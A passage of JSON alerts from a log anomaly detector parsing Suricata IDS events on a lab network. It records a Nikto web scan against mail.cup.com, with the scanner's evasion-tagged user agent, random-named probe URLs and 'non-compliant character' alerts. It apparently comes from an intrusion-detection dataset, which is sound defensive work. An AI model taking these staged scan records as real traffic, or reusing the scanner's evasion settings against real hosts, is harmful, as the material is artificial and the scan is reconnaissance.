"/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.dpgs", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46796,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46796, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1904689130685302,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1904689130685302, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.182096+0000\",\"flow_id\":1904689130685302,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46796,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dpgs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dpgs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.183734 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46798 -> 192.168.10.154:80", "/parser/model/time": 1583349514.183734, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46798, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.183734 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46798 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.showsource", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.184027+0000\",\"flow_id\":2212887393913480,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46798,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.showsource\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.showsource\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.184027, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2212887393913480,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46798,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.showsource\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.showsource\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46798,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.showsource\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.showsource\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.showsource\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.showsource\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.showsource", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.showsource", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46798,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46798, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2212887393913480,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2212887393913480, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.184027+0000\",\"flow_id\":2212887393913480,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46798,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.showsource\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.showsource\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.186320 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46800 -> 192.168.10.154:80", "/parser/model/time": 1583349514.18632, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46800, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.186320 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46800 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cfg", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.186581+0000\",\"flow_id\":1239879732876050,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46800,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cfg\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cfg\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.186581, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1239879732876050,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46800,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cfg\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cfg\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46800,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cfg\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cfg\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cfg\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cfg\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cfg", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cfg", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46800,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46800, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1239879732876050,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1239879732876050, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.186581+0000\",\"flow_id\":1239879732876050,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46800,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cfg\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cfg\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.188797 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46802 -> 192.168.10.154:80", "/parser/model/time": 1583349514.188797, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46802, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.188797 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46802 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.iso8859-2", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.189008+0000\",\"flow_id\":964576624172563,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46802,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.189008, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":964576624172563,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46802,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46802,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 